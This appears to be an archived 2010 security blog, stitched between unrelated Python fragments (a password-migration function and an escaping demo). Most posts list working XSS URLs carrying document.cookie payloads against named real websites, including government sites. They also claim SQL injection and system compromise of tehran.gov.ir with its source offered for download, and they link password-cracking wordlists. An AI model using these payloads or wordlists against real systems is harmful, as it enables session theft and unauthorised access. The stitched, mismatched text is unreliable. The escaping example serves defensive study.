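    """Check a login against a user record {'scheme', 'hash', 'salt', 'username'}.
    If the record still uses one of the table's schemes and the password is right,
    the record is rewritten in place to the modern scheme (migration on login)."""
    if record["scheme"] == MODERN_SCHEME:
        return verify_modern(password, record["hash"])
    ok = verify_legacy(record["scheme"], password, record["hash"],
                       record.get("salt", ""), record.get("username", ""))
    if ok:
        record["hash"] = hash_modern(password)
        record["scheme"] = MODERN_SCHEME
        record["salt"] = ""  # the salt now lives inside the hash string
    return ok


if __name__ == "__main__":
    # Constructed record in the IPB 2.x / myBB 1.2.x format from the table.
    scheme = "md5(md5($salt).md5($pass))"
    user = {"username": "alice", "scheme": scheme, "salt": "k3Qz7",
            "hash": LEGACY_SCHEMES[scheme]("correct horse", "k3Qz7", "alice")}
    print(login(user, "wrong"), user["scheme"])           # False, still legacy
    print(login(user, "correct horse"), user["scheme"])   # True, now pbkdf2_sha256
```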

Saturday, 24 April 2010

Theregister.co.uk XSS


Lately I've found a stored XSS on theregister.co.uk.
The XSS can be used only by sending, via a POST request,
both the "job_function" and "other_job_function" values (or both "job_sector" and "other_job_sector")
in the users' area.
By sending a specific link we can escalate privileges by automating the reset of the victim's password.
Obviously the victim should be logged in!
A full video explains how to get other accounts starting from the stored XSS and a few CSRF.

You can watch here a video explaining the problem and the simulation
of the hijacking of a session of a theregister's user.

Archived page on securitytube: http://archive.is/OgZlz


They have already replied to my email and solved the problem! Thumbs up for them.

Thursday, 22 April 2010

List of wordlists

I've put up a list of links to several wordlists. Links have been grabbed from several websites:

I don't know your blog, I've found the links on different websites.

(I've used http://rapiddigger.com/ and similar sites, so I didn't care about the references before. Add a comment if you want a link; there's no problem with it.)
http://carlitobrigante.wordpress.com/2008/03/21/wyd-e-raccolta-wordlist/
http://blog.advanced-techno.net/index.php/2008/07/13/wordlist-da-15-gb/
http://www.backtrack-linux.org/forums/old-pentesting/4336-%3Dxploitz%3D-thread-share-wordlist-2.html
http://www.ashiyane.org/forums/showthread.php?p=60160
http://hashcrack.blogspot.com

I will update the list when I find/need other links.

http://rapidshare.com/files/135050307/wordlist--hrvatski.txt.html
http://rapidshare.com/files/67152210/1_5GB_Wordlist_gepackt_5MB_.rar
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://www.outpost9.com/files/WordLists.html
http://hashkiller.com/files/downloads/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://vxchaos.6x.to/Wordlists and Wordlist Tools/
http://www.hack3r.com/wordlists/wikipedia-wordlist-sraveau-20090325.txt.bz2
http://downloads.sourceforge.net/cracklib/cracklib-words-20080507.gz
http://packetstormsecurity.org/Crackers/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.vulnerabilityassessment.co.uk/passwords.zip
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.insidepro.com/eng/download.shtml
http://www.apasscracker.com/dictionaries/
http://downloads.skullsecurity.org/passwords/
http://rapidshare.com/files/88229830/Wordlist.rar
http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
http://www.megaupload.com/?d=QTK6GI9K | birthdates
http://www.megaupload.com/?d=XV34VA9Z | default wpa list 8 to 40 alpha-numeric characters
http://www.megaupload.com/?d=L7LQSH5U |BIG WPA WORDLIST #1
http://www.megaupload.com/?d=2P23UCLV |BIG WPA WORDLIST #2
http://www.megaupload.com/?d=F6DEE204 |BIG WPA WORDLIST #3
http://article7.org/wordlists/
http://rapidshare.com/files/100655354/Bender-ILLIST.rar.html
http://milw0rm.org/mil-dic.php
http://www.rohitab.com/discuss/index.php?s=fc0c2d65c4f55e204846775b49346668&app=core&module=attach&section=attach&attach_id=1235
http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
http://nomorecrypto.com/files/naxxatoe-dict-total-new-unsorted.torrent
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://bright-shadows.net/download/downloads.php
http://www.mit.edu/~ecprice/wordlist.10000
http://www.neutronsite.com/WordList.txt
http://artofhacking.com/tucops/hack/password/
http://rapidshare.com/files/165513464/word.lst.s.u.john.s.u.200.part01.rar |wordlist su john #1
http://rapidshare.com/files/165518143/word.lst.s.u.john.s.u.200.part02.rar |wordlist su john #2
http://rapidshare.com/files/165498510/word.lst.s.u.john.s.u.200.part03.rar |wordlist su john #3
http://rapidshare.com/files/90611743/purehates_word_list.part1.rar | purehates wordlist #1
http://rapidshare.com/files/90620632/purehates_word_list.part2.rar | purehates wordlist #2
http://rapidshare.com/files/90628318/purehates_word_list.part3.rar | purehates wordlist #3
http://rapidshare.com/files/90636711/purehates_word_list.part4.rar | purehates wordlist #4
http://rapidshare.com/files/90639703/purehates_word_list.part5.rar | purehates wordlist #5
http://rapidshare.com/files/90571168/-_Xploitz_-_Master_Password_Collection.part1.rar
http://rapidshare.com/files/90580220/-_Xploitz_-_Master_Password_Collection.part2.rar
http://rapidshare.com/files/90584305/-_Xploitz_-_Master_Password_Collection.part3.rar
http://rapidshare.com/files/90592992/-_Xploitz_-_Master_Password_Collection.part4.rar
http://rapidshare.com/files/90598343/-_Xploitz_-_Master_Password_Collection.part5.rar
http://rapidshare.com/files/90603742/-_Xploitz_-_Master_Password_Collection.part6.rar
http://rapidshare.com/files/90605481/-_Xploitz_-_Master_Password_Collection.part7.rar -->-> Password: http://forums.remote-exploit.org/
http://rapidshare.com/files/90652987/-_Xploitz_-_PASSWORD_DVD.part01.rar
http://rapidshare.com/files/90660770/-_Xploitz_-_PASSWORD_DVD.part02.rar
http://rapidshare.com/files/90673505/-_Xploitz_-_PASSWORD_DVD.part03.rar
http://rapidshare.com/files/90682244/-_Xploitz_-_PASSWORD_DVD.part04.rar
http://rapidshare.com/files/90691363/-_Xploitz_-_PASSWORD_DVD.part05.rar
http://rapidshare.com/files/90700044/-_Xploitz_-_PASSWORD_DVD.part06.rar
http://rapidshare.com/files/90702550/-_Xploitz_-_PASSWORD_DVD.part07.rar -->-> Password: http://forums.remote-exploit.org/

Tuesday, 20 April 2010

Anti rootkits list

 ATool - http://www.antiy.net/download/atool.rar
 ATool (mirror) - http://www.kernelmode.info/ARKs/atool.rar
 Avast! Antirootkit - http://files.avast.com/files/beta/aswar.exe
 Antivir Antirootkit - http://dl.antivir.de/down/windows/antivir_rootkit.zip
 Catchme - http://www2.gmer.net/catchme.exe
 CodeWalker ARK - http://cmcinfosec.com/download/cmcark_cw0.2.4.500.rar
 CodeWalker ARK (mirror) - http://www.kernelmode.info/ARKs/cmcark_cw0.2.4.500.rar
 CsrWalker - http://www.rootkit.com/vault/DiabloNova/cwalker.rar
 DarkSpy 1.05 - http://www.rootkit.com/vault/cardmagic/DS105fix2beta.rar
 DeepMonitor - http://orkblutt.free.fr/DeepMonitor.exe
 Deep System Explorer - http://diamondcs.com.au/downloads/dsesetup.exe
 Dr. Web DwShark (mirror) - http://www.kernelmode.info/ARKs/DwShark.rar
 F-Secure Blacklight - ftp://ftp.f-secure.com/anti-virus/tools/fsbl.exe
 Find_Hidden_Dll (by Eric_71) 0.1.1.1 - http://eric71.geekstogo.com/beta/Find_Dll.exe
 GMER - http://www2.gmer.net/gmer.zip
 Helios - http://helios.miel-labs.com/downloads/Helios.zip
 Helios Lite - http://helios.miel-labs.com/downloads/Helios-Lite.zip
 HiddenFinder - http://www.wenpoint.com/download/HiddenFinder_setup.exe
 Hook Analyzer - http://www.resplendence.com/download/hookanlz302.exe
 HookShark - http://home.arcor.de/neotracer/HookShark.rar
 IceSword 1.22 (english) - http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip
 IceSword 1.22 (english) (mirror) - http://www.kernelmode.info/ARKs/IceSword122en.zip
 Kernel Detective v1.3.1 - http://www.at4re.com/files/Tools/Releases/GamingMasteR/Kernel_Detective_v1.3.1.zip
 Kernel Detective v1.3.1 (mirror) - http://www.kernelmode.info/ARKs/Kernel_Detective_v1.3.1.zip
 kX-Ray 1.0.0.102 - http://bugczech.fu8.com/bin/kX-Ray_v1.0.0.102_XP32_beta.zip
 McAfee Rootkit Detective - http://download.nai.com/products/mcafee-avert/McafeeRootkitDetective.zip
 modGREPER - http://invisiblethings.org/tools/modGREPER/modGREPER-0.3-bin.zip
 NIAP Rootkit Detect Tools - http://www.rootkit.com/vault/uty/NIAPAntiRootkitTools.rar
 Panda Antirootkit - http://research.pandasecurity.com/blogs/images/AntiRootkit.zip
 Process Hunter - http://www.wasm.ru/baixado.php?mode=tool&id=359
 Process Walker - http://www.rootkit.com/vault/DiabloNova/ProcessWalker.rar
 Radix - http://www.usec.at/downloads3/radix_installer.zip
 RegReveal - http://www.geocities.jp/kiskzo/regreveal_v10beta3.zip
 RootkitDetector - http://www.tarasco.org/security/Rootkit_Detector_rkdetector/RootkitDetector.zip
 Rootkit Unhooker 3.8 - http://www.rootkit.com/vault/DiabloNova/RkU3.8.386.589.rar
 Rootkit Revealer - http://download.sysinternals.com/Files/RootkitRevealer.zip
 RootQuest (dead link) - http://comsentry.com/files/RootQuest_v1.exe
 RootQuest (mirror) - http://www.kernelmode.info/ARKs/RootQuest_v1.rar
 RootRepeal - http://rootrepeal.googlepages.com/RootRepeal.rar
 Safe'n'Sec Personal Pro + Rootkit Detector - http://www.safensoft.com/sns/snsrd_eng.exe
 SafetyCheck 1.7 - http://yyuyao.googlepages.com/SafetyCheck1.7Beta.rar
 SanityCheck 2.00 - http://www.resplendence.com/download/sanitySetup.exe
 Sophos Antirootkit - http://www.sophos.com/products/free-tools/sophos-anti-rootkit/download/
 Stealth MBR Rootkit Detector - http://www2.gmer.net/mbr/mbr.exe
 SysProt Antirootkit - http://sites.google.com/site/sysprotantirootkit/Home/SysProt.zip?attredirects=0&d=1
 SysReveal - http://www.sysreveal.com/download/SysReveal.zip
 TDSS Remover - http://www.esagelab.com/files/tdss_remover_latest.rar
 Tizer Rootkit Razor - http://www.tizersecure.com/freedownloads/Tizer%20Rootkit%20Razor%20Setup.msi
 TrendMicro RootkitBuster - http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_2.80.1077.zip
 VBA32 Antirootkit - ftp://vba.ok.by/vba/beta/Vba32arkit_beta.zip
 XueTr - http://xuetr.com/download/XueTr.zip
 YasKit 1.223 - http://qzdx.kafan.cn/down1//AntiSpyWare/2009/YasKit1.223.rar
 YasKit 1.223 (mirror) - http://www.kernelmode.info/ARKs/YasKit1.223.rar




Ref: kernelmode.info

Sunday, 18 April 2010

rot13 party | XSS forms

Ok ... now with the rot13


string
 </textarea><script>alert(document.cookie);</script><textarea>
encoded
 </grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>
------------------------------------------
sites with raw post


http://www.rot13.com/index.php
text=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://rot13-encoder-decoder.ewebdev.com/
plain_text_for_rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%281%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




http://authors.aspalliance.com/brettb/ROT13EncodingWithASP.asp
ROT13=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&B1=Encode%2FDecode+ROT13


http://www.retards.org/projects/rot13/
rotme=+%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://edoceo.com/utilitas/rot13
in=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cmd=ROT13


http://geekgirl.dk/stuff/rot13.html
intext=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://mcraigweaver.com/rot13.php
raw=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&cooked=&Rotate=Rotate+it.


http://doug.finalownage.com/tools/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://www.geomatics.ca/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encrypt+%2F+Decrypt&submitted=yes


http://spectraldesign.net/rot13.php
rot13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&convert=ROT-13


http://lowkeysoft.com/LostARG/rot13.php
decoding=true&code=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&submit=Decode




http://www.toms-geocache.de/Werkzeuge/rot13.php?txtROT13=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&btnCoder=kodieren


http://www.lasoft.cz/gc/hw/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=%C5%A0ifruj+%2F+de%C5%A1ifruj


http://www.viruscom2.com/web-app/encode-decode-ROT13.php
textCode=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E&Submit=Encode-Decode+Now%21%21%21


http://www.nwhtweb.com/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E


http://kamil.eu.org/rot13.php
text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%28qbphzrag.pbbxvr%29%3B%3C%2Ffpevcg%3E%3Cgrkgnern%3E




------------------------------------------------
Urg .... most of them are repetitive and too simple. 

sourcecodesworld.com - givemethecode.com | XSS SQL Injection



asp/mysql SQL INJ
http://www.sourcecodesworld.com/showScriptSite.asp?ScriptId=459




XSS (back from google?)
http://www.sourcecodesworld.com/search.asp?domains=www.sourcecodesworld.com%3Bwww.givemethecode.com&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&sa=Google+Search&sitesearch=www.sourcecodesworld.com&client=pub-6213915329796065&forid=1&channel=7633136160&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23995500%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3AB00C00%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A004F23%3BALC%3AB00C00%3BLC%3AB00C00%3BT%3A000000%3BGFNT%3A000000%3BGIMP%3A000000%3BLH%3A50%3BLW%3A313%3BL%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%2Fimages%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.sourcecodesworld.com%3BFORID%3A11&hl=en


XSS

http://www.givemethecode.com/sign.asp?returnURL=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22http://www.givemethecode.com/source/view-my-source.asp

http://base64-decode.php-functions.com/ | XSS

The idea is to submit data to be decoded (base64 in this case) and see if the decoded output is reflected so that we can inject the XSS.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
  -------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
 -------------------------------------------------------------


Note: the </textarea> and <textarea> tags are useless in this case, but they are needed in 90% of the other similar cases, where the results are shown inside a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another, more trivial base64 decoder, with a few differences.
http://www.toastedspam.com/decode64
- it doesn't decode the data correctly
- it tries to remove or convert < and > into HTML entities


I've spent about ten minutes (sic) to achieve this XSS




The string to convert (b=a; is padding so that the string decodes cleanly, without stray characters after decoding)
a=document.cookie; b=a; alert(a); 
The converted string
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7





When we submit the data we should use Tamper Data (or Firebug, to change the HTML) and
change disp to script (disp=script)


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script
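As an added example, not code from any of the decoder sites listed in this post or in the rot13 one above, here is why the payload works and what the fix looks like: a decoder that interpolates its output into a <textarea> unescaped lets </textarea> end the field, so the <script> that follows becomes live markup, while html.escape keeps the same decoded text inert. The rot13 and base64 inputs are the ones from the posts; the result-page templates and the browser-style check are constructed.

```python
"""Reflected output in decoder utilities: the vulnerable rendering next to the
escaped one. Added example; not code from any site named in these posts."""
import base64
import codecs
import html
import re

# Inputs from the posts: the rot13-encoded string, and the HTML document that
# was base64-encoded (B64_INPUT reproduces the blob shown in the post).
ROT13_INPUT = "</grkgnern><fpevcg>nyreg(qbphzrag.pbbxvr);</fpevcg><grkgnern>"
HTML_INPUT = ("<html><head></head><body></textarea><script>alert(document.cookie);"
              "</script><textarea></body></html>")
B64_INPUT = base64.b64encode(HTML_INPUT.encode("utf-8")).decode("ascii")


def decode_rot13(text: str) -> str:
    return codecs.decode(text, "rot_13")


def decode_base64(text: str) -> str:
    return base64.b64decode(text).decode("utf-8", errors="replace")


# Constructed templates standing in for a decoder page's result form.
def render_vulnerable(decoded: str) -> str:
    """Decoded text dropped straight into the textarea: a '</textarea>' in the
    data ends the field and whatever follows is parsed as markup."""
    return f'<form><textarea name="result">{decoded}</textarea></form>'


def render_safe(decoded: str) -> str:
    """Same page, but the HTML-significant characters are escaped, so the
    decoded text can only ever be text inside the textarea."""
    return f'<form><textarea name="result">{html.escape(decoded, quote=True)}</textarea></form>'


_TEXTAREA = re.compile(r"<textarea\b[^>]*>.*?</textarea\s*>", re.I | re.S)


def live_script_tags(markup: str) -> int:
    """Browser-like count of <script> tags that would execute. A textarea's
    content is RCDATA: everything up to the first '</textarea' is text, so a
    <script> inside it is inert. Strip those regions, then count what is left."""
    outside = _TEXTAREA.sub("", markup)
    return len(re.findall(r"<script\b", outside, re.I))


def check(decoder, encoded: str) -> dict:
    """Run one encoded input through both renderings and report live scripts."""
    decoded = decoder(encoded)
    return {"vulnerable": live_script_tags(render_vulnerable(decoded)),
            "safe": live_script_tags(render_safe(decoded))}


if __name__ == "__main__":
    print("rot13 :", check(decode_rot13, ROT13_INPUT))   # {'vulnerable': 1, 'safe': 0}
    print("base64:", check(decode_base64, B64_INPUT))    # {'vulnerable': 1, 'safe': 0}
```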



tobu.co.jp | xss

The Tobu railway in Japan.


http://www.tobu.co.jp/transit_fare/?link=http://eki.tobu.co.jp/norikae/pc/N3?USR=PC&sf=1735-%91%e5%98a%93c&st=2319-%90V%8b%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22%cb%90%b6&sr=0&pn=3&rp=0&tp=0&ep=1&date=2'0100418&time=0910

www.normateneo.unibo.it | xss

simple
http://www.normateneo.unibo.it/NormAteneo/default.htm?search=0&view=1&PageNumber=1&textToSearch=%22%3e%3cscript%3ealert(document.cookie)%3b%3c%2fscript%3e%3c%22

Saturday, 17 April 2010

turkstat.gov.tr | XSS - sys compromise

http://www.turkstat.gov.tr/kp/kullanici/forgotPassword.do?reqCode=pre%3Cscript%3Ealert(1);%3C/script%3EpareForgotPasswordForm

tehran.gov.ir | sql injection - XSS - system compromise


Set free all the political captives, all the human rights activists.
The Iranian  Government should think about the internal problems instead of arguing about anything.
Iran and the Usa MUST stop all the Atomic Programs.
The new Iran must be laic, with the freedom to choose your religion, peaceful and without any kind of violence!

Equal rights for the women! 
Stop the violences!
------------------------------------------------------------------------- 



There are surely other XSS and SQL injections.

Several SQL injections in NewsId
http://www.tehran.gov.ir/new/Default_view.asp?NewsId=13892


XSS in name
http://www.tehran.gov.ir/new/Default_Services.asp?chid=17&name=<script>alert(document.cookie);</script>


The system (a Windows box) could be compromised and the source code obtained, due to a misconfiguration.
You can download the source code here.

Friday, 16 April 2010

Watch youtube with opera browser - "GO UPGRADE!"

YouTube has updated the website, practically kicking the butts of Opera users with the permanent message "GO UPGRADE!".

There's a workaround to fix this issue!
Just install this user javascript file


Before anything, if you haven't done it before, you must create the folder for the scripts (I suggest a folder within the Opera application folder ... or, if you want, in the application data folder).
I've used "%programfiles%\Opera\JS"
Put this javascript in the folder. -click here-

( copyright 2010, Snap )
After that, open Opera, click on File->Preferences->Advanced->Content->JavaScript Options
and select the User JavaScript folder.


Reference: http://extendopera.org/userjs/content/youtube-protection-remover 

mail.com | xss, possible phishing/spam


http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002žscriptualert(EXSSE)ž/scriptu&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=30530-web-20100416-201528&rt=STANDARD#x0D;ascript:alert(%27myxss%27);%22%3E&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=anything&rt=STANDARD


base url: http://web.mail.com/
31423-111 - can be anything (url rewriting??)
mmc-2/ - can be anything (url rewriting??)
en-us - can be anything (url rewriting??). This should set the language.
common - can be anything (url rewriting??)



A funny joke XD (for me)
http://web.mail.com/31423-111/mmc-2/en-us/common/error.aspx?code=80070002&ssm=true&chm=true&sbl=false&ph=web.mail.com&reportid=You need to buy a new computer&rt=STANDARD

europa.eu - xpath injections

europa.eu is mainly based on ColdFusion, with Oracle as the DBMS (via JDBC).
The main website is probably proxied via http://yakima.cc.cec.eu.int:6085 (I'm not able to clearly understand all the ColdFusion errors).


------link removed as requested------

I cannot publish the url but it's easy to spot (in my opinion).

Note: A few hours with a fuzzer can give you good results.
-------
